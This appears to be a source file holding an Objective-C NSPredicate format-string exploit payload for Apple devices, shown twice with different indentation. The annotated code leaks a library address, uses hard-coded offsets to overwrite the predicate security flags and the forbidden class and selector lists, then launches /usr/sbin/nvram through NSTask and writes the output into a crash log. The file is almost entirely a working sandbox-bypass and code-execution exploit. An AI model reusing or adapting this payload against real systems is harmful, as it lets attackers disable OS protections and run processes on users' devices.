aemmitt-ns/nspredpayload.m

## nspredpayload.m
NSPredicate *pred = [NSPredicate predicateWithFormat:@"1=cast({" // cast to get nice error in syslog for debugging
    // use format string to read the address of _NSPredicateUtilities ( #self() ), theres prolly a better way
    "$_NSPredicateUtilities    := function('','stringByAppendingFormat:', '%p/%lld', #self()).lastPathComponent.longLongValue,"
    "$_predicateSecurityFlags  := $_NSPredicateUtilities + 0x188c,"      // address of _predicateSecurityFlags
    "$_predicateSecurityOnce   := $_predicateSecurityFlags - 0x276daec," // address of _predicateSecurityOnce
    "$forbiddenClassesLength   := $_predicateSecurityFlags + 0x63a334,"  // address of length field for array of forbidden classes
    "$forbiddenSelectorsLength := $_predicateSecurityFlags + 0x63a3d4,"  // address of length field for array of forbidden selectors

    "$NSTask := $_NSPredicateUtilities + 0x637860," // address of NSTask class
    "$NSPipe := $NSTask - 0x41a0,"                  // address of NSPipe class

    "function(1, 'self'," // wrapper function so the undefined results dont cause crash
        "function(-1, 'getValue:', $_predicateSecurityOnce.nonretainedObjectValue),"    // set _predicateSecurityOnce = -1, no checks
        "function( 0, 'getValue:', $_predicateSecurityFlags.nonretainedObjectValue),"   // set _predicateSecurityFlags = 0, no exceptions
        "function( 0, 'getValue:', $forbiddenClassesLength.nonretainedObjectValue),"    // set length of class name array to 0
        "function( 0, 'getValue:', $forbiddenSelectorsLength.nonretainedObjectValue))," // set length of selector array to 0

    "$dict := '<dict><key>_NSTaskExecutablePath</key><string>/usr/sbin/nvram</string>"  // dict for NSTask
        "<key>_NSTaskArgumentArray</key><array><string>-p</string></array></dict>'.propertyList,"

    // set _NSTaskOutputFileHandle to a pipe so we can get the output
    "function($dict, 'setObject:forKey:', $NSPipe.nonretainedObjectValue.pipe, '_NSTaskOutputFileHandle'),"
    "$task := function($NSTask.nonretainedObjectValue, 'launchedTaskWithDictionary:', $dict)," // launch NSTask
    "function(1, 'self', $task.waitUntilExit, " // wrapper function so the undefined results dont cause crash

        "function($task.standardOutput.fileHandleForReading.availableData, 'writeToFile:atomically:'," // get output from NSTask
            "'/private/var/mobile/Library/Logs/CrashReporter/nvram.ips', nil))}, 'NSDate')"];          // write to crash log file
	NSPredicate *pred = [NSPredicate predicateWithFormat:@"1=cast({" // cast to get nice error in syslog for debugging
	// use format string to read the address of _NSPredicateUtilities ( #self() ), theres prolly a better way
	"$_NSPredicateUtilities := function('','stringByAppendingFormat:', '%p/%lld', #self()).lastPathComponent.longLongValue,"
	"$_predicateSecurityFlags := $_NSPredicateUtilities + 0x188c," // address of _predicateSecurityFlags
	"$_predicateSecurityOnce := $_predicateSecurityFlags - 0x276daec," // address of _predicateSecurityOnce
	"$forbiddenClassesLength := $_predicateSecurityFlags + 0x63a334," // address of length field for array of forbidden classes
	"$forbiddenSelectorsLength := $_predicateSecurityFlags + 0x63a3d4," // address of length field for array of forbidden selectors

	"$NSTask := $_NSPredicateUtilities + 0x637860," // address of NSTask class
	"$NSPipe := $NSTask - 0x41a0," // address of NSPipe class

	"function(1, 'self'," // wrapper function so the undefined results dont cause crash
	"function(-1, 'getValue:', $_predicateSecurityOnce.nonretainedObjectValue)," // set _predicateSecurityOnce = -1, no checks
	"function( 0, 'getValue:', $_predicateSecurityFlags.nonretainedObjectValue)," // set _predicateSecurityFlags = 0, no exceptions
	"function( 0, 'getValue:', $forbiddenClassesLength.nonretainedObjectValue)," // set length of class name array to 0
	"function( 0, 'getValue:', $forbiddenSelectorsLength.nonretainedObjectValue))," // set length of selector array to 0

	"$dict := '<dict><key>_NSTaskExecutablePath</key><string>/usr/sbin/nvram</string>" // dict for NSTask
	"<key>_NSTaskArgumentArray</key><array><string>-p</string></array></dict>'.propertyList,"

	// set _NSTaskOutputFileHandle to a pipe so we can get the output
	"function($dict, 'setObject:forKey:', $NSPipe.nonretainedObjectValue.pipe, '_NSTaskOutputFileHandle'),"
	"$task := function($NSTask.nonretainedObjectValue, 'launchedTaskWithDictionary:', $dict)," // launch NSTask
	"function(1, 'self', $task.waitUntilExit, " // wrapper function so the undefined results dont cause crash

	"function($task.standardOutput.fileHandleForReading.availableData, 'writeToFile:atomically:'," // get output from NSTask
	"'/private/var/mobile/Library/Logs/CrashReporter/nvram.ips', nil))}, 'NSDate')"]; // write to crash log file